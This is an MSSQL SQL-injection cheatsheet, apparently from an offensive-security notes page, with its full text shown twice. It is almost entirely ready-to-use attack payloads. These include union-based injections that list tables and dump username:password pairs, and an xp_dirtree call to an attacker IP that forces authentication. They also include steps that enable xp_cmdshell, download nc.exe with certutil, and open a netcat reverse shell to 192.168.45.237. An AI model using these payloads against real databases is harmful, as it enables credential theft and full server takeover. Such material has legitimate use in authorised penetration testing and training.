MSSQL Cheatsheet

Database names and ID's

user
db_name(5)
union select name,id from <db>..sysobjects where xtype='u'-- -
union select concat(name,':',id) from <db>..sysobjects where xtype='u'-- -
union select 1,(select string_agg(concat(name,':',id), '|') from <db>..sysobjects where xtype='u')-- -

Select @@version;
Select name from sys.databases;
select * from master.information_schema.tables;
select * from master..users;

database's 1-4 are default mssql databases ; also note down the database ID for table queries

Enumerate columns

union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')

Dump columns

union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -

%s/[ ]//g

%s/|/\r/g

cat cracked | awk -F: '{print $1":"$3}'

cat cracked | awk -F: '{print $1}'

Query stacking with ;

q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -

RCE

sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

'EXEC sp_configure 'show advanced options',1-- -
'RECONFIGURE-- - 
'EXEC sp_configure 'xp_cmdshell',1-- -
'RECONFIGURE-- -

'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -

'EXEC xp_cmdshell 'certutil.exe -f -urlcache "http://192.168.45.237/nc.exe" C:\programdata\nc.exe'-- -
'EXEC xp_cmdshell 'powershell.exe -c "C:\Programdata\nc.exe -e powershell.exe 192.168.45.237 1337"'-- -

PreviousMySQL Cheatsheet NextPostgres Cheatsheet

Last updated 7 months ago

MSSQL Cheatsheet

Database names and ID's

user
db_name(5)
union select name,id from <db>..sysobjects where xtype='u'-- -
union select concat(name,':',id) from <db>..sysobjects where xtype='u'-- -
union select 1,(select string_agg(concat(name,':',id), '|') from <db>..sysobjects where xtype='u')-- -

Select @@version;
Select name from sys.databases;
select * from master.information_schema.tables;
select * from master..users;

database's 1-4 are default mssql databases ; also note down the database ID for table queries

Enumerate columns

union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')

Dump columns

union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -

%s/[ ]//g

%s/|/\r/g

cat cracked | awk -F: '{print $1":"$3}'

cat cracked | awk -F: '{print $1}'

Query stacking with ;

q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -

RCE

sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

'EXEC sp_configure 'show advanced options',1-- -
'RECONFIGURE-- - 
'EXEC sp_configure 'xp_cmdshell',1-- -
'RECONFIGURE-- -

'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -

'EXEC xp_cmdshell 'certutil.exe -f -urlcache "http://192.168.45.237/nc.exe" C:\programdata\nc.exe'-- -
'EXEC xp_cmdshell 'powershell.exe -c "C:\Programdata\nc.exe -e powershell.exe 192.168.45.237 1337"'-- -

PreviousMySQL Cheatsheet NextPostgres Cheatsheet

Last updated 7 months ago